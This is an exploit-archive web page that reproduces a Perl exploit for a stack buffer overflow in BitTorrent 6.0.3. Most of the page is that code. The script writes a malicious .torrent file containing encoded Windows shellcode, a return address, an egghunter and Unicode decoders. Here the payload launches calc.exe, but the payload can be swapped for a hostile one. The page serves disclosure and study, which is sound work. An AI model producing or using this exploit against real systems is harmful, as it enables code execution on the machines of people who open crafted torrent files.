Register | Forget Password | Login
Search :
SecurityReason

News

Search

SecurityAlert

About SecurityAlert

ExploitAlert

SecurityReason Research
WLB

WLB Database

Send to WLB

About WLB
RSS

News

SecurityAlert

World Laboratory of Bugtraq

ExploitAlert

Apache

PHP
Corporate

Contact

About us
Services

SecurePHP
Note

If you have found a vulnerability, please send to our SecurityAlert Database :
secalert()securityreason()com

Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com
Details : ExploitAlert

  Topic : BitTorrent 6.0.3 .torrent File Stack Buffer Overflow Exploit
  ExploitAlert : 4959
  Milw0rm ID : 6787
  Credit : k`sOSe && oVeret
  Date : 21.10.2008

  Download

  Exploit Code :  

#!/usr/bin/perl
# BitTorrent 6.0.3 .torrent File Stack Buffer Overflow Exploit
# 09/21/2008 by k`sOSe && oVeret

use warnings;
use strict;

# If you change this(avoid \x80->\x9f unless you really know what you are
doing) you must also change the length value of the decoder
my $shellcode =
# windows/exec CMD="C:\WINDOWS\system32\calc.exe"
#[*] x86/alpha_mixed succeeded, final size 337

"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" .
"\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41" .
"\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41" .
"\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b\x4c\x4b\x58\x51" .
"\x54\x43\x30\x45\x50\x45\x50\x4c\x4b\x51\x55\x47\x4c\x4c" .
"\x4b\x43\x4c\x45\x55\x44\x38\x43\x31\x4a\x4f\x4c\x4b\x50" .
"\x4f\x42\x38\x4c\x4b\x51\x4f\x47\x50\x43\x31\x4a\x4b\x51" .
"\x59\x4c\x4b\x50\x34\x4c\x4b\x43\x31\x4a\x4e\x46\x51\x49" .
"\x50\x4a\x39\x4e\x4c\x4b\x34\x49\x50\x42\x54\x43\x37\x49" .
"\x51\x48\x4a\x44\x4d\x45\x51\x48\x42\x4a\x4b\x4c\x34\x47" .
"\x4b\x50\x54\x47\x54\x43\x34\x43\x45\x4d\x35\x4c\x4b\x51" .
"\x4f\x51\x34\x45\x51\x4a\x4b\x42\x46\x4c\x4b\x44\x4c\x50" .
"\x4b\x4c\x4b\x51\x4f\x45\x4c\x43\x31\x4a\x4b\x4c\x4b\x45" .
"\x4c\x4c\x4b\x45\x51\x4a\x4b\x4d\x59\x51\x4c\x46\x44\x45" .
"\x54\x48\x43\x51\x4f\x46\x51\x4b\x46\x45\x30\x46\x36\x45" .
"\x34\x4c\x4b\x47\x36\x50\x30\x4c\x4b\x51\x50\x44\x4c\x4c" .
"\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x45\x38\x45\x58\x4d" .
"\x59\x4b\x48\x4d\x53\x49\x50\x42\x4a\x50\x50\x45\x38\x4a" .
"\x50\x4c\x4a\x43\x34\x51\x4f\x45\x38\x4c\x58\x4b\x4e\x4c" .
"\x4a\x44\x4e\x50\x57\x4b\x4f\x4a\x47\x50\x43\x46\x5a\x51" .
"\x4c\x46\x37\x50\x49\x50\x4e\x51\x54\x50\x4f\x50\x57\x50" .
"\x53\x51\x4c\x42\x53\x43\x49\x44\x33\x44\x34\x45\x35\x42" .
"\x4d\x50\x33\x46\x52\x51\x4c\x42\x43\x43\x51\x42\x4c\x45" .
"\x33\x46\x4e\x43\x55\x42\x58\x42\x45\x43\x30\x44\x4a\x41" .
"\x41";

$shellcode .= "\x87\x87"; # -> \x21\x20\x21\x20 -> EGG ( for english
windows version )

my $ret = "\x3f\x41"; # -> unicode friendly pop,pop,ret

# unicode friendly get_EIP (needed by the venetian decoder)
sub get_eip
{
#0041 00 ADD BYTE PTR DS:[ECX],AL
#5F POP EDI
#0041 00 ADD BYTE PTR DS:[ECX],AL
#5F POP EDI
#0041 00 ADD BYTE PTR DS:[ECX],AL
#6A 00 PUSH 0
#58 POP EAX
#0041 00 ADD BYTE PTR DS:[ECX],AL
#57 PUSH EDI
#0041 00 ADD BYTE PTR DS:[ECX],AL
#54 PUSH ESP
#0041 00 ADD BYTE PTR DS:[ECX],AL
#5A POP EDX
#0042 00 ADD BYTE PTR DS:[EDX],AL
#40 INC EAX
#0042 00 ADD BYTE PTR DS:[EDX],AL
#40 INC EAX
#0042 00 ADD BYTE PTR DS:[EDX],AL
#40 INC EAX
#0042 00 ADD BYTE PTR DS:[EDX],AL
#40 INC EAX
#0042 00 ADD BYTE PTR DS:[EDX],AL
#40 INC EAX
#0042 00 ADD BYTE PTR DS:[EDX],AL
#40 INC EAX
#0042 00 ADD BYTE PTR DS:[EDX],AL
#40 INC EAX
#0042 00 ADD BYTE PTR DS:[EDX],AL
#40 INC EAX
#0042 00 ADD BYTE PTR DS:[EDX],AL
#40 INC EAX
#0042 00 ADD BYTE PTR DS:[EDX],AL
#40 INC EAX
#0042 00 ADD BYTE PTR DS:[EDX],AL
#40 INC EAX
#0042 00 ADD BYTE PTR DS:[EDX],AL
#40 INC EAX
#0042 00 ADD BYTE PTR DS:[EDX],AL
#43 INC EBX
#0042 00 ADD BYTE PTR DS:[EDX],AL
#58 POP EAX
#0041 00 ADD BYTE PTR DS:[ECX],AL
"\x5f\x41\x5f\x41\x6a\x58\x41\x57\x41\x54\x41\x5a" . "\x42\x40" x 12 .
"\x42\x43" . "\x42\x58\x41";
}


sub egghunter
{
#6A01 PUSH 1
#5E POP ESI
#4E DEC ESI (=0)
#6A72 PUSH 72 <- starts from 0x00720000
#56 PUSH ESI
#4C DEC ESP
#4C DEC ESP
#5E POP ESI
#5E POP ESI <- ESI == 0x00720000
#BA21202120 /MOV EDX,20212021 <- egg
#46 |INC ESI
#3B16 |CMP EDX,DWORD PTR DS:[ESI]
#75FB \JNZ SHORT egghunter
"\x6A\x01\x5E\x4E\x6A\x72\x56\x4C\x4C\x5E\x5E\xBA\x21\x20\x21\x20\x46\x3B\
x16\x75\xFB";
}

# this will decode the unicode expanded shellcode pushing it to the stack
and the execute it
sub decoder
{
#46 INC ESI
#6A01 PUSH 1
#6801010155 PUSH 0x55010101
#4C DEC ESP
#5B POP EBX
#5B POP EBX
#AD /LODS DWORD PTR DS:[ESI]
#50 |PUSH EAX
#44 |INC ESP
#44 |INC ESP
#44 |INC ESP
#4E |DEC ESI
#4E |DEC ESI
#4E |DEC ESI
#4E |DEC ESI
#4E |DEC ESI
#4E |DEC ESI
#4B |DEC EBX
#83FB01 |CMP EBX,1
#75EF \JNE SHORT decoder
#54 PUSH ESP
#59 POP ECX
#4C DEC ESP -> realign
#51 PUSH ECX
#C3 RET
"\x46\x6A\x01\x68\x01\x01\x01\x55\x4C\x5B\x5B\xAD\x50\x44\x44\x44\x4E\x4E\x
4E\x4E\x4E\x4E\x4B\x83\xFB\x01\x75\xEF\x54\x59\x4c\x51\xc3";
}

# venetian deccoder + venetian encoded egghunter and decoder
sub venetian_decoder
{
"\x05\x03\x01\x71\x2D\x01\x01\x71\x40\x71\xC6\x01\x71\x40\x71\x40".
"\x71\xC6\x4E\x71\x40\x71\x40\x71\xC6\x72\x71\x40\x71\x40\x71\xC6".
"\x4C\x71\x40\x71\x40\x71\xC6\x5E\x71\x40\x71\x40\x71\xC6\xBA\x71".
"\x40\x71\x40\x71\xC6\x20\x71\x40\x71\x40\x71\xC6\x20\x71\x40\x71".
"\x40\x71\xC6\x3B\x71\x40\x71\x40\x71\xC6\x75\x71\x40\x71\x40\x71".
"\xC6\x46\x71\x40\x71\x40\x71\xC6\x01\x71\x40\x71\x40\x71\xC6\x01".
"\x71\x40\x71\x40\x71\xC6\x01\x71\x40\x71\x40\x71\xC6\x4C\x71\x40".
"\x71\x40\x71\xC6\x5B\x71\x40\x71\x40\x71\xC6\x50\x71\x40\x71\x40".
"\x71\xC6\x44\x71\x40\x71\x40\x71\xC6\x4E\x71\x40\x71\x40\x71\xC6".
"\x4E\x71\x40\x71\x40\x71\xC6\x4E\x71\x40\x71\x40\x71\xC6\x4B\x71".
"\x40\x71\xFE\xFE\x40\x71\xC6\xFB\x71\x40\x71\x40\x71\xC6\x75\x71".
"\x40\x71\x40\x71\xC6\x54\x71\x40\x71\x40\x71\xC6\x4C\x71\x40\x71".
"\x40\x71\xC6\xC3\x71\x40\x71\x04\x04\x04\x04\x04\x04\x04\x04\x04".
"\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04".
"\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04".
"\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04".
"\x6A\x5E\x6A\x56\x4C\x5E\x21\x21\x46\x16\xFB\x6A\x68\x01\x55\x5B".
"\xAD\x44\x44\x4E\x4E\x4E\x81\x01\xEF\x59\x51";
}

my $stack_buffer = $ret x 192 . get_eip() . venetian_decoder();

open(HANDLE, "> torrent.torrent") || die "Error!\n\n";
print HANDLE "d8:announce17:http://qwerty.qwe7:comment" .
length($shellcode) .":" .
$shellcode .
"10:created by" .
length($stack_buffer) . ":" .
$stack_buffer .
"13:creation
datei1218555046e8:encoding10:iso-8859-14:infod6:lengthi1e4:name6:bu.txt12:p
iece lengthi65536e6:pieces20:".
"\x86\xf7\xe4\x37\xfa\xa5\xa7\xfc\xe1\x5d\x1d\xdc\xb9\xea\xea\xea\x37\x76
\x67\xb8\x65\x65\x0a";
close (HANDLE);
Alert

Microsoft VISTA TCP/IP stack buffer overflow

high- 2008-11-27

Microsoft Device IO Control wrapped by the iphlpapi.dll API shipping with Windows Vista 32 bit and 64 bit contains a possibly exploitable, buffer overflow corrupting kernel memory.
Apache rss

» Apache Tomcat information
   disclosure

» Apache Tomcat <=
   6.0.18 UTF8 Directory
   Traversal Vulnerability

» Apache Tomcat information
   disclosure vulnerability

» Apache Tomcat XSS
   vulnerability
PHP rss

» PHP 5.2.6 SAPI
   php_getuid() overload

» PHP
   ZipArchive::extractTo()
   Directory Traversal
   Vulnerability

» PHP 5.2.6 dba_replace()
   destroying file

» PHP 5.2.6 (error_log)
   safe_mode bypass
Copyright © SecurityReason. All Rights Reserved.